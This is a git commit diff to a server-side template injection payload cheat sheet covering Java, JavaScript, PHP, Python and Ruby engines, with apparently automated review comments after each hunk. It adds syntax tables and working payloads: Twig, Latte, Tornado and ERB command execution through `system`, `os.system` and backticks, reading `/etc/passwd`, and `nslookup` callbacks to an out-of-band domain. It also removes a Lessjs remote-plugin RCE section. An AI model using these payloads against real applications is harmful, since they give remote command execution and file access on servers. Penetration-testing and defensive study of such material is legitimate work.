Templating Libraries Tables

Swissky 2024-11-02 17:42:18 +01:00
parent b29edefe09
commit d77ef2c4fc
7 changed files with 153 additions and 90 deletions

Binary file not shown (image, 784 KiB).

View File

@ -2,6 +2,7 @@
## Summary ## Summary
- [Templating Libraries](#templating-libraries)
- [Java](#java) - [Java](#java)
- [Java - Basic injection](#java---basic-injection) - [Java - Basic injection](#java---basic-injection)
- [Java - Retrieve the systems environment variables](#java---retrieve-the-systems-environment-variables) - [Java - Retrieve the systems environment variables](#java---retrieve-the-systems-environment-variables)
@ -28,9 +29,24 @@
- [Groovy - Sandbox Bypass](#groovy---sandbox-bypass) - [Groovy - Sandbox Bypass](#groovy---sandbox-bypass)
## Templating Libraries
| Template Name | Payload Format |
| ------------ | --------- |
| Codepen | `#{}` |
| Freemarker | `${3*3}`, `#{3*3}`, `[=3*3]` |
| Groovy | `${9*9}` |
| Jinjava | `{{ }}` |
| Pebble | `{{ }}` |
| Spring | `*{7*7}` |
| Thymeleaf | `[[ ]]` |
| Velocity | `#set($X="") $X` |
## Java ## Java
### Java - Basic injection ### Java - Basic injection
> Multiple variable expressions can be used, if `${...}` doesn't work try `#{...}`, `*{...}`, `@{...}` or `~{...}`. > Multiple variable expressions can be used, if `${...}` doesn't work try `#{...}`, `*{...}`, `@{...}` or `~{...}`.
```java ```java
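Review bot: the `Codepen` row in the new Java table does not correspond to any Java templating library documented on this page (the sections visible in this diff cover Groovy, Jinjava, Pebble and Velocity, plus the Thymeleaf expression forms under "Java - Basic injection"); verify the entry or drop it. Two smaller points in the same table: the `Spring` row gives `*{7*7}`, but `*{...}` is the Thymeleaf selection-expression syntax already listed in the note under "Java - Basic injection" (`${...}`, `#{...}`, `*{...}`, `@{...}`, `~{...}`), so label that row `Spring (Thymeleaf)` or move the payload to the `Thymeleaf` row; and the probe constants are mixed (`3*3`, `9*9`, `7*7`), so pick one value so a reader can recognise the evaluated output at a glance.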
@ -154,6 +170,7 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230
## Pebble ## Pebble
[Official website](https://pebbletemplates.io/) [Official website](https://pebbletemplates.io/)
> Pebble is a Java templating engine inspired by [Twig](./#twig) and similar to the Python [Jinja](./#jinja2) Template Engine syntax. It features templates inheritance and easy-to-read syntax, ships with built-in autoescaping for security, and includes integrated support for internationalization. > Pebble is a Java templating engine inspired by [Twig](./#twig) and similar to the Python [Jinja](./#jinja2) Template Engine syntax. It features templates inheritance and easy-to-read syntax, ships with built-in autoescaping for security, and includes integrated support for internationalization.
### Pebble - Basic injection ### Pebble - Basic injection
@ -188,6 +205,7 @@ New version of Pebble :
## Velocity ## Velocity
[Official website](https://velocity.apache.org/engine/1.7/user-guide.html) [Official website](https://velocity.apache.org/engine/1.7/user-guide.html)
> Velocity is a Java-based template engine. It permits web page designers to reference methods defined in Java code. > Velocity is a Java-based template engine. It permits web page designers to reference methods defined in Java code.
```python ```python
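Review bot: the Velocity block that opens at the last context line of this hunk is fenced as ```python although its content is Velocity directives inside a Java engine section; the Java sections above use ```java, so retag the fence (pre-existing, but this hunk touches the line directly above it and is the natural place to fix it).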

View File

@ -2,17 +2,33 @@
## Summary ## Summary
- [Templating Libraries](#templating-libraries)
- [Handlebars](#handlebars) - [Handlebars](#handlebars)
- [Handlebars - Command Execution](#handlebars---command-execution) - [Handlebars - Command Execution](#handlebars---command-execution)
- [Lessjs](#lessjs)
- [Lessjs - SSRF / LFI](#lessjs---ssrf--lfi)
- [Lessjs < v3 - Command Execution](#lessjs--v3---command-execution)
- [Lessjs Plugins](#lessjs-plugins)
- [Lodash](#Lodash) - [Lodash](#Lodash)
- [Lodash - Basic Injection](#lodash---basic-injection) - [Lodash - Basic Injection](#lodash---basic-injection)
- [Lodash - Command Execution](#lodash---command-execution) - [Lodash - Command Execution](#lodash---command-execution)
## Templating Libraries
| Template Name | Payload Format |
| ------------ | --------- |
| DotJS | `{{= }}` |
| DustJS | `{}` |
| EJS | `<% %>` |
| HandlebarsJS | `{{ }}` |
| HoganJS | `{{ }}` |
| Lodash | `{{= }}` |
| MustacheJS | `{{ }}` |
| NunjucksJS | `{{ }}` |
| PugJS | `#{}` |
| TwigJS | `{{ }}` |
| UnderscoreJS | `<% %>` |
| VelocityJS | `#=set($X="")$X` |
| VueJS | `{{ }}` |
## Handlebars ## Handlebars
[Official website](https://handlebarsjs.com/) [Official website](https://handlebarsjs.com/)
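Review bot: the four Lessjs summary entries (`Lessjs`, `Lessjs - SSRF / LFI`, `Lessjs < v3 - Command Execution`, `Lessjs Plugins`) disappear here and nothing else in the commit reintroduces them, so confirm the removal is intended before the table work is merged. In the new table, the `Lodash` row lists `{{= }}`, but lodash's default interpolate delimiter is `<%= %>` (the same as the `UnderscoreJS` row); `{{= }}` only applies when `_.templateSettings.interpolate` has been changed, so either note that condition or list the default. The `VelocityJS` row reads `#=set($X="")$X`, which differs from the Java `Velocity` row's `#set($X="") $X`; confirm the `#=set` form is intended rather than a typo.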
@ -44,63 +60,6 @@
--- ---
## Lessjs
[Official website](https://lesscss.org/)
> Less (which stands for Leaner Style Sheets) is a backwards-compatible language extension for CSS. This is the official documentation for Less, the language and Less.js, the JavaScript tool that converts your Less styles to CSS styles.
### Lessjs - SSRF / LFI
```less
@import (inline) "http://localhost";
// or
@import (inline) "/etc/passwd";
```
### Lessjs < v3 - Command Execution
```less
body {
color: `global.process.mainModule.require("child_process").execSync("id")`;
}
```
### Lessjs Plugins
Lessjs plugins can be remotely included and are composed of Javascript which gets executed when the Less is transpiled.
```less
// example local plugin usage
@plugin "plugin-2.7.js";
```
or
```less
// example remote plugin usage
@plugin "http://example.com/plugin-2.7.js"
```
version 2 example RCE plugin:
```javascript
functions.add('cmd', function(val) {
return `"${global.process.mainModule.require('child_process').execSync(val.value)}"`;
});
```
version 3 and above example RCE plugin
```javascript
//Vulnerable plugin (3.13.1)
registerPlugin({
install: function(less, pluginManager, functions) {
functions.add('cmd', function(val) {
return global.process.mainModule.require('child_process').execSync(val.value).toString();
});
}
})
```
---
## Lodash ## Lodash
[Official website](https://lodash.com/docs/4.17.15) [Official website](https://lodash.com/docs/4.17.15)
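Review bot: this hunk deletes the whole Lessjs section (the `@import (inline)` SSRF/LFI primitive, the `< v3` backtick command execution, and the `@plugin` local/remote plugin RCE with both the v2 `functions.add` and the v3 `registerPlugin` forms) without a replacement anywhere in the commit, and the commit title "Templating Libraries Tables" does not mention a removal. If the reason is that Less is a CSS preprocessor rather than a templating engine, move the content to its own page and keep the `Lessjs` summary entries pointing there rather than dropping it; if it is intentionally removed, say so in the commit message so readers following old anchors know where it went.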

View File

@ -2,17 +2,33 @@
## Summary ## Summary
- [Templating Libraries](#templating-libraries)
- [Smarty](#smarty) - [Smarty](#smarty)
- [Twig](#twig) - [Twig](#twig)
- [Twig - Basic injection](#twig---basic-injection) - [Twig - Basic injection](#twig---basic-injection)
- [Twig - Template format](#twig---template-format) - [Twig - Template format](#twig---template-format)
- [Twig - Arbitrary File Reading](#twig---arbitrary-file-reading) - [Twig - Arbitrary File Reading](#twig---arbitrary-file-reading)
- [Twig - Code execution](#twig---code-execution) - [Twig - Code execution](#twig---code-execution)
- [Latte](#latte)
- [Latte - Basic injection](#latte---basic-injection)
- [Latte - Code execution](#latte---code-execution)
- [patTemplate](#pattemplate) - [patTemplate](#pattemplate)
- [PHPlib](#phplib-and-html_template_phplib) - [PHPlib](#phplib-and-html_template_phplib)
- [Plates](#plates) - [Plates](#plates)
## Templating Libraries
| Template Name | Payload Format |
| -------------- | --------- |
| Laravel Blade | `{{ }}` |
| Latte | `{var $X=""}{$X}` |
| Mustache | `{{ }}` |
| Plates | `<?= ?>` |
| Smarty | `{ }` |
| Twig | `{{ }}` |
## Smarty ## Smarty
[Official website](https://www.smarty.net/docs/en/) [Official website](https://www.smarty.net/docs/en/)
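Review bot: three of the six rows (`Laravel Blade`, `Mustache`, `Twig`) carry the identical `{{ }}` payload format, so the table cannot tell a reader which engine they are looking at; add a discriminating probe column, or point to the existing "Twig - Template format" section listed in the summary. The `Latte` row is also inconsistent with the others: it gives a full variable-declaration probe (`{var $X=""}{$X}`) where every other row gives only the delimiters, and the same probe is repeated under "Latte - Basic injection" further down. Pick one meaning for the "Payload Format" column and apply it to all rows.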
@ -78,6 +94,7 @@ $output = $twig > render (
{{['cat$IFS/etc/passwd']|filter('system')}} {{['cat$IFS/etc/passwd']|filter('system')}}
{{['id']|filter('passthru')}} {{['id']|filter('passthru')}}
{{['id']|map('passthru')}} {{['id']|map('passthru')}}
{{['nslookup oastify.com']|filter('system')}}
``` ```
Example injecting values to avoid using quotes for the filename (specify via OFFSET and LENGTH where the payload FILENAME is) Example injecting values to avoid using quotes for the filename (specify via OFFSET and LENGTH where the payload FILENAME is)
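Review bot: the new `{{['nslookup oastify.com']|filter('system')}}` line hard-codes the Burp Collaborator base domain `oastify.com`; a lookup of the bare vendor domain gives the tester no signal, since only a lookup of their own collaborator subdomain is observable. Use the placeholder convention this file already uses in the next hunk's context line (`@attacker.tld`), or write `<collaborator-id>.oastify.com`, so the reader knows the value must be substituted.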
@ -95,6 +112,23 @@ email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld
--- ---
## Latte
### Latte - Basic injection
```php
{var $X="POC"}{$X}
```
### Latte - Code execution
```php
{php system('nslookup oastify.com')}
```
---
## patTemplate ## patTemplate
> [patTemplate](https://github.com/wernerwa/pat-template) non-compiling PHP templating engine, that uses XML tags to divide a document into different parts > [patTemplate](https://github.com/wernerwa/pat-template) non-compiling PHP templating engine, that uses XML tags to divide a document into different parts
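Review bot: the new Latte section has no `[Official website]` line and no version information, while the other engine sections on this page (Smarty directly above, for example) open with one; add it, and state which Latte version the `{php system('nslookup oastify.com')}` payload was verified against, since the `{php ...}` tag is not guaranteed to be enabled in every Latte setup and a reader will need to check. The hard-coded `oastify.com` domain should be the page's `attacker.tld` placeholder or a `<collaborator-id>.oastify.com` form, because an nslookup of the bare vendor domain is not observable by the tester. The two fences are tagged `php` although their content is Latte template syntax rather than PHP.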

View File

@ -2,7 +2,14 @@
## Summary ## Summary
- [Templating Libraries](#templating-libraries)
- [Django](#django) - [Django](#django)
- [Django - Basic injection](#django---basic-injection)
- [Django - Cross-site scripting](#django---cross-site-scripting)
- [Django - Debug information leak](#django---debug-information-leak)
- [Django - Leaking app's Secret Key](#django---leaking-apps-secret-key)
- [Django - Admin Site URL leak](#django---admin-site-url-leak)
- [Django - Admin username and password hash leak](#django---admin-username-and-password-hash-leak)
- [Jinja2](#jinja2) - [Jinja2](#jinja2)
- [Jinja2 - Basic injection](#jinja2---basic-injection) - [Jinja2 - Basic injection](#jinja2---basic-injection)
- [Jinja2 - Template format](#jinja2---template-format) - [Jinja2 - Template format](#jinja2---template-format)
@ -11,21 +18,39 @@
- [Jinja2 - Dump all config variables](#jinja2---dump-all-config-variables) - [Jinja2 - Dump all config variables](#jinja2---dump-all-config-variables)
- [Jinja2 - Read remote file](#jinja2---read-remote-file) - [Jinja2 - Read remote file](#jinja2---read-remote-file)
- [Jinja2 - Write into remote file](#jinja2---write-into-remote-file) - [Jinja2 - Write into remote file](#jinja2---write-into-remote-file)
- [Jinja2 - Remote Code Execution](#jinja2---remote-code-execution) - [Jinja2 - Remote Command Execution](#jinja2---remote-command-execution)
- [Forcing output on blind RCE](#jinja2---forcing-output-on-blind-rce) - [Forcing output on blind RCE](#jinja2---forcing-output-on-blind-rce)
- [Exploit the SSTI by calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread) - [Exploit the SSTI by calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread)
- [Exploit the SSTI by calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen) - [Exploit the SSTI by calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen)
- [Exploit the SSTI by calling Popen without guessing the offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset) - [Exploit the SSTI by calling Popen without guessing the offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset)
- [Exploit the SSTI by writing an evil config file.](#exploit-the-ssti-by-writing-an-evil-config-file) - [Exploit the SSTI by writing an evil config file.](#exploit-the-ssti-by-writing-an-evil-config-file)
- [Jinja2 - Filter bypass](#jinja2---filter-bypass) - [Jinja2 - Filter bypass](#jinja2---filter-bypass)
- [Tornado](#tornado)
- [Tornado - Basic injection](#tornado---basic-injection)
- [Tornado - Remote Command Execution](#tornado---remote-command-execution)
- [Mako](#mako) - [Mako](#mako)
- [Direct access to os from TemplateNamespace:](#direct-access-to-os-from-templatenamespace) - [Mako - Remote Command Execution](#mako---remote-command-execution)
- [References](#references)
## Templating Libraries
| Template Name | Payload Format |
| ------------ | --------- |
| Bottle | `{{ }}` |
| Chameleon | `${ }` |
| Cheetah | `${ }` |
| Django | `{{ }}` |
| Jinja2 | `{{ }}` |
| Mako | `${ }` |
| Pystache | `{{ }}` |
| Tornado | `{{ }}` |
## Django ## Django
Django template language supports 2 rendering engines by default: Django Templates (DT) and Jinja2. Django Templates is much simpler engine. It does not allow calling of passed object functions and impact of SSTI in DT is often less severe than in Jinja2. Django template language supports 2 rendering engines by default: Django Templates (DT) and Jinja2. Django Templates is much simpler engine. It does not allow calling of passed object functions and impact of SSTI in DT is often less severe than in Jinja2.
### Django - Detection ### Django - Basic injection
```python ```python
{% csrf_token %} # Causes error with Jinja2 {% csrf_token %} # Causes error with Jinja2
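Review bot: renaming "Django - Detection" to "Django - Basic injection" misdescribes the content that follows it: the payloads under that heading (`{% csrf_token %} # Causes error with Jinja2`, `ih0vr{{364|add:733}}d121r`) are engine-fingerprinting probes that separate Django Templates from Jinja2, not injection primitives. Keep "Detection" in the heading and in the summary anchor, or add a sentence explaining that detection and basic injection coincide for DT. On the table: five of the eight rows (`Bottle`, `Django`, `Jinja2`, `Pystache`, `Tornado`) share `{{ }}` and three (`Chameleon`, `Cheetah`, `Mako`) share `${ }`, so the table alone cannot identify an engine; a pointer to the `{% csrf_token %}` discriminator and to the "Jinja2 - Template format" section would make it actionable.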
@ -33,47 +58,34 @@ Django template language supports 2 rendering engines by default: Django Templat
ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
``` ```
### Django Templates for post-exploitation
```python ### Django - Cross-site scripting
# Variables
{{ variable }}
{{ variable.attr }}
# Filters
{{ value|length }}
# Tags
{% csrf_token %}
```
### Cross-site scripting
```python ```python
{{ '<script>alert(3)</script>' }} {{ '<script>alert(3)</script>' }}
{{ '<script>alert(3)</script>' | safe }} {{ '<script>alert(3)</script>' | safe }}
``` ```
### Debug information leak ### Django - Debug information leak
```python ```python
{% debug %} {% debug %}
``` ```
### Leaking apps Secret Key ### Django - Leaking apps Secret Key
```python ```python
{{ messages.storages.0.signer.key }} {{ messages.storages.0.signer.key }}
``` ```
### Admin Site URL leak ### Django - Admin Site URL leak
``` ```
{% include 'admin/base.html' %} {% include 'admin/base.html' %}
``` ```
### Admin username and password hash leak ### Django - Admin username and password hash leak
``` ```
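Review bot: the removed "Django Templates for post-exploitation" block was the only place this section introduced the three syntax forms (`{{ variable }}`, `{{ value|length }}`, `{% csrf_token %}`) that the remaining payloads rely on (`{{ ... | safe }}`, `{% debug %}`, `{% include 'admin/base.html' %}`); with it gone and the new table listing only `{{ }}` for Django, the `{% %}` tag and `|filter` syntax now appear without introduction. Keep a one-line form of it, or fold the tag and filter delimiters into the Django table row. Minor: the heading reads "Leaking apps Secret Key" while the summary entry says "Leaking app's Secret Key"; the anchor still resolves, but the two texts should match.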
@ -162,7 +174,7 @@ Access `__globals__` and `__builtins__`:
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }} {{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
``` ```
### Jinja2 - Remote Code Execution ### Jinja2 - Remote Command Execution
Listen for connection Listen for connection
@ -295,11 +307,33 @@ Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by http
--- ---
## Tornado
### Tornado - Basic injection
```py
{{7*7}}
{{7*'7'}}
```
### Tornado - Remote Command Execution
```py
{{os.system('whoami')}}
{%import os%}{{os.system('nslookup oastify.com')}}
```
---
## Mako ## Mako
[Official website](https://www.makotemplates.org/) [Official website](https://www.makotemplates.org/)
> Mako is a template library written in Python. Conceptually, Mako is an embedded Python (i.e. Python Server Page) language, which refines the familiar ideas of componentized layout and inheritance to produce one of the most straightforward and flexible models available, while also maintaining close ties to Python calling and scoping semantics. > Mako is a template library written in Python. Conceptually, Mako is an embedded Python (i.e. Python Server Page) language, which refines the familiar ideas of componentized layout and inheritance to produce one of the most straightforward and flexible models available, while also maintaining close ties to Python calling and scoping semantics.
```python ```python
<% <%
import os import os
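Review bot: `{{os.system('whoami')}}`, the first line under "Tornado - Remote Command Execution", assumes `os` is already present in the template namespace; only the second line imports it with `{%import os%}`, so on a stock template the first payload fails unless the application passed `os` in. Put the import first, and note that `os.system()` returns the process exit status rather than its output, so the rendered page shows `0`, not the username; `os.popen('whoami').read()` (the form the Mako section already uses with `os.popen('id').read()`) returns the output. Also, the fences are tagged `py` where the rest of this file uses `python`, and `nslookup oastify.com` needs the tester's own collaborator subdomain to produce an observable lookup.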
@ -308,7 +342,7 @@ x=os.popen('id').read()
${x} ${x}
``` ```
### Direct access to os from TemplateNamespace: ### Mako - Remote Command Execution
Any of these payloads allows direct access to the `os` module Any of these payloads allows direct access to the `os` module
@ -376,6 +410,7 @@ PoC :
<module 'os' from '/usr/local/lib/python3.10/os.py'> <module 'os' from '/usr/local/lib/python3.10/os.py'>
``` ```
Source [@podalirius_](https://twitter.com/podalirius_) : [https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)
--- ## References
* [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)

View File

@ -73,7 +73,8 @@ Based on the successful response, the attacker determines which template engine
* **Java**: Freemarker, Jinjava, Velocity, ... * **Java**: Freemarker, Jinjava, Velocity, ...
* **Ruby**: ERB, Slim, ... * **Ruby**: ERB, Slim, ...
[This post](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756) summurize the syntax and detection method for most of the template engines for JavaScript, Python, Ruby, Java and PHP and how to differentiate between engines that use the same syntax. [The post "template-engines-injection-101" from @0xAwali](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756) summarize the syntax and detection method for most of the template engines for JavaScript, Python, Ruby, Java and PHP and how to differentiate between engines that use the same syntax.
### Escalate to Code Execution ### Escalate to Code Execution
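Review bot: grammar in the reworded sentence: "[The post ...] summarize the syntax and detection method" should read "summarizes the syntax and detection methods" (singular subject "post"). The new wording also names the post by its URL slug ("template-engines-injection-101") while the reference added in the next hunk uses the title "Template Engines Injection 101"; use the title in both places.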
@ -106,3 +107,4 @@ Once the template engine is identified, the attacker injects more complex expres
* [Bug Writeup: RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass - Dec 4, 2022](https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/) * [Bug Writeup: RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass - Dec 4, 2022](https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/)
* [Leveraging the Spring Expression Language (SpEL) injection vulnerability ( a.k.a The Magic SpEL) to get RCE - Xenofon Vassilakopoulos - November 18, 2021](https://xen0vas.github.io/Leveraging-the-SpEL-Injection-Vulnerability-to-get-RCE/) * [Leveraging the Spring Expression Language (SpEL) injection vulnerability ( a.k.a The Magic SpEL) to get RCE - Xenofon Vassilakopoulos - November 18, 2021](https://xen0vas.github.io/Leveraging-the-SpEL-Injection-Vulnerability-to-get-RCE/)
* [Expression Language Injection - OWASP](https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection) * [Expression Language Injection - OWASP](https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection)
* [Template Engines Injection 101 - Mahmoud M. Awali - Nov 1, 2024](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756)

View File

@ -2,11 +2,25 @@
## Summary ## Summary
- [Templating Libraries](#templating-libraries)
- [Ruby](#ruby) - [Ruby](#ruby)
- [Ruby - Basic injections](#ruby---basic-injections) - [Ruby - Basic injections](#ruby---basic-injections)
- [Ruby - Retrieve /etc/passwd](#ruby---retrieve-etcpasswd) - [Ruby - Retrieve /etc/passwd](#ruby---retrieve-etcpasswd)
- [Ruby - List files and directories](#ruby---list-files-and-directories) - [Ruby - List files and directories](#ruby---list-files-and-directories)
- [Ruby - Code execution](#ruby---code-execution) - [Ruby - Remote Command execution](#ruby---remote-Command-execution)
## Templating Libraries
| Template Name | Payload Format |
| ------------ | --------- |
| Erb | `<%= %>` |
| Erubi | `<%= %>` |
| Erubis | `<%= %>` |
| HAML | `#{ }` |
| Liquid | `{{ }}` |
| Mustache | `{{ }}` |
| Slim | `#{ }` |
## Ruby ## Ruby
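Review bot: the new summary link `#ruby---remote-Command-execution` keeps an uppercase `C`, but Markdown renderers generate heading anchors in lowercase (`#ruby---remote-command-execution`) and fragment matching is case-sensitive, so the link will not jump to the section; lowercase it. The heading it points to ("Ruby - Remote Command execution") should also be capitalised like the other headings introduced in this commit ("Tornado - Remote Command Execution", "Mako - Remote Command Execution"). In the table, the `Erb`, `Erubi` and `Erubis` rows all give `<%= %>` and `HAML` and `Slim` both give `#{ }`, which is accurate but means the table alone does not distinguish them; a note that the "Ruby - Basic injections" section covers the shared ERB-family syntax would help.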
@ -37,11 +51,12 @@
<%= Dir.entries('/') %> <%= Dir.entries('/') %>
``` ```
### Ruby - Code execution ### Ruby - Remote Command execution
Execute code using SSTI for **ERB** engine. Execute code using SSTI for **Erb**,**Erubi**,**Erubis** engine.
```ruby ```ruby
<%=(`nslookup oastify.com`)%>
<%= system('cat /etc/passwd') %> <%= system('cat /etc/passwd') %>
<%= `ls /` %> <%= `ls /` %>
<%= IO.popen('ls /').readlines() %> <%= IO.popen('ls /').readlines() %>
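Review bot: the reworded sentence "Execute code using SSTI for **Erb**,**Erubi**,**Erubis** engine." needs spaces after the commas and a plural noun: "for the **Erb**, **Erubi** and **Erubis** engines". On the new payload `<%=(`nslookup oastify.com`)%>`: the parentheses around the backtick expression are redundant (`<%= `nslookup ...` %>` matches the `<%= `ls /` %>` form two lines below), and the bare `oastify.com` domain should be the tester's own collaborator subdomain or a placeholder, since the DNS lookup is the only signal this payload produces.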